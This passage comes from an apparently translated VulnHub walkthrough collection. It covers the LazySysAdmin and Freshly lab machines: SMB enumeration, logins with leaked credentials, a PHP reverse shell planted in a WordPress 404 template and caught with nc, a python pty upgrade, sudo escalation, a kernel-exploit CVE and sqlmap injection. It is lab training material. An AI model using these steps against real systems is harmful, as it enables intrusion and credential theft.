style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;">[<span class="cm-operator">+</span>] Getting local groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100 via RID cycling (RIDS: <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050)    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-22-1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-32</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-32 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-544 BUILTIN\Administrators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-545 BUILTIN\Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-546 BUILTIN\Guests (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-547 BUILTIN\Power Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-548 BUILTIN\Account Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-549 BUILTIN\Server 
Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-550 BUILTIN\Print Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1000 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1001 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-22-1 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-22-1-1000 Unix User\togie (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" 
CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting printer info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No printers returned.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">enum4linux complete on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:33 <span class="cm-number">2018</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 4142px;"></div><div class="CodeMirror-gutters" style="display: none; height: 4172px;"></div></div></div></pre><p>Mount the share on Windows</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">net use k: \\<span class="cm-number">192</span>.168.0.100\share<span class="cm-def">$</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" 
style="display: none; height: 61px;"></div></div></div></pre><p>Mount the share on Linux</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">mount <span class="cm-attribute">-t</span> cifs <span class="cm-attribute">-o</span> <span class="cm-def">username</span><span class="cm-operator">=</span><span class="cm-string">''</span><span class="cm-def">,password</span><span class="cm-operator">=</span><span class="cm-string">''</span> //192.168.0.100/share<span class="cm-def">$ </span>/mnt</span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p><img 
src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/2.png' alt='2' referrerPolicy='no-referrer' /></p><p>Two key files are found: deets.txt and wp-config.php.</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/3.png' alt='3' referrerPolicy='no-referrer' /></p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/4.png' alt='4' referrerPolicy='no-referrer' /></p><p>Logging in to phpMyAdmin with the MySQL username and password obtained above works, but not a single table entry can be viewed.</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/5.png' alt='5' referrerPolicy='no-referrer' /></p><p>In addition, there is another password above, 12345, and when the WordPress page was visited earlier it displayed <code>My name is togie.</code>, so we try SSH with username <code>togie</code> and password <code>12345</code>, and the login succeeds.</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ 
whoami</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[sudo] password <span class="cm-keyword">for</span> togie: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@LazySysAdmin:/home/togie<span class="cm-comment"># id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 
215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><p>With root privileges we can read the target file /root/proof.txt, which completes the whole game. Here togie happens to have root rights through sudo (the id output shows membership in the sudo group), so switching to root with sudo su works directly; if togie did not have them, privilege escalation would have to go through some other route.</p><h3><a name='header-n8459' class='md-header-anchor '></a>Approach 2</h3><p>Log in to the WordPress dashboard with username <code>Admin</code> and password <code>TogieMYSQL12345^^</code> and insert PHP reverse-shell code into the 404.php page template.</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/7.png' alt='7' referrerPolicy='no-referrer' /></p><p>After editing, click the upload file button underneath to apply the change, then visit <a href='http://192.168.0.100/wordpress/?p=2' target='_blank' class='url'>http://192.168.0.100/wordpress/?p=2</a></p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~<span class="cm-comment"># 
nc -vlp 1234</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">listening on [any] <span class="cm-number">1234</span> ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">192</span>.168.0.100: inverse host lookup failed: Unknown host</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] <span class="cm-number">36468</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Linux LazySysAdmin <span class="cm-number">4</span>.4.0-31-generic <span class="cm-comment">#50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">16</span>:03:42 up <span class="cm-number">6</span> min,  <span class="cm-number">0</span> users,  load average: <span class="cm-number">0</span>.01, <span class="cm-number">0</span>.15, <span class="cm-number">0</span>.11</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">/bin/sh: <span class="cm-number">0</span>: can<span class="cm-string">'t access tty; job control turned off</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ whoami</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">www-data</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">sudo</span>: no tty present and no askpass program specified</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 376px;"></div><div class="CodeMirror-gutters" style="display: none; height: 406px;"></div></div></div></pre><p>We get "no tty present and no askpass program specified"; the target happens to have Python available, so use Python to spawn a new shell with a pty.</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div 
class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">python <span class="cm-attribute">-c</span> <span class="cm-string">'import pty; pty.spawn("/bin/sh")'</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>But we do not know the www-data password, so the next step is privilege escalation. First, look at the target's details.</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div 
style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ uname</span> <span class="cm-attribute">-r</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">4</span>.4.0-31-generic</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ lsb_release</span> <span class="cm-attribute">-a</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No LSB modules are available.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Distributor ID:<span class="cm-tab" role="presentation" cm-text="  "> </span>Ubuntu</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Description:<span class="cm-tab" role="presentation" cm-text="  ">    </span>Ubuntu <span class="cm-number">14</span>.04.5 LTS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Release:<span class="cm-tab" role="presentation" cm-text="    ">    </span><span 
class="cm-number">14</span>.04</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Codename:<span class="cm-tab" role="presentation" cm-text="    ">   </span>trusty</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 196px;"></div><div class="CodeMirror-gutters" style="display: none; height: 226px;"></div></div></div></pre><p>So CVE-2017-1000112 can be used to escalate privileges, but the target has no gcc. In that situation, set up a local environment identical to the target, compile the escalation exploit there, and then run the binary on the target.</p><p>How to install dirb (Kali already ships with it)</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">wget</span> https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz</span></pre></div><pre class=" 
CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">tar zxvf dirb222.tar.gz</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cd</span> dirb222/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">apt-get install libcurl4-gnutls-dev</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./configure && <span class="cm-builtin">make</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./dirb <span class="cm-comment"># then run it</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 146px;"></div><div class="CodeMirror-gutters" style="display: none; height: 176px;"></div></div></div></pre><p>References:</p><p><a href='https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/'>VulnHub Walk-through – LazySysAdmin: 1</a></p><p><a href='https://uart.io/2017/12/lazysysadmin-1/'>LazySysAdmin Vulnerable Machine Walk-through</a></p><h1><a name='header-n8486' class='md-header-anchor '></a>Section 6: Freshly</h1><h1><a name='header-n8489' class='md-header-anchor '></a>Vulnhub-TopHatSec: Freshly</h1><h2><a name='header-n8490' class='md-header-anchor '></a>Target overview</h2><h3><a name='header-n8491' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/tophatsec/Freshly.ova' target='_blank' class='url'>https://download.vulnhub.com/tophatsec/Freshly.ova</a></p><h3><a name='header-n8494' class='md-header-anchor '></a>Runtime environment</h3><ul><li>VirtualBox</li><li>VMware (running it shows an error, and the fix link it points to is already a 404)</li></ul><p>VirtualBox is recommended for setting up this target.</p><h3><a name='header-n8504' class='md-header-anchor '></a>Description</h3><p>The goal of this target is to penetrate the host over the network and find the secret hidden in a sensitive file.</p><h3><a name='header-n8508' 
class='md-header-anchor '></a>Runtime environment</h3><p>Import the downloaded OVA file into VirtualBox.</p><h2><a name='header-n8511' class='md-header-anchor '></a>Penetration approach</h2><h3><a name='header-n8512' class='md-header-anchor '></a>Service discovery</h3><p>Port scan</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Operating system identification</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Further scan of the main ports</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Port 80</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Port 8080</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Ports 8080 and 443 are both web services, and both run WordPress.</p><h3><a name='header-n8535' class='md-header-anchor '></a>Checking known services</h3><p>Scan WordPress</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Three plugins have security issues, but they are of little help for further penetration. While that scan runs, use <code>nikto</code> to scan directories on port 80, which reveals phpmyadmin and login.php.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Test it with sqlmap</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SQL injection is present</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>List the databases</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_12.jpg' alt='' 
referrerPolicy='no-referrer' /></p><p>Looking in the WordPress8080 database, we find the WordPress username and password</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Log in to the dashboard and change the language to Chinese</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_14.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8570' class='md-header-anchor '></a>Getting a shell</h3><p>There are two ways to get a shell from WordPress. One is to add a plugin: pack a correctly formatted shell into a .zip and upload it.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The other is to edit a theme file directly</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Here we use the direct-edit approach to get a shell, writing the shell into the 404 page</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Start an nc listener locally</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Visit the 404 page
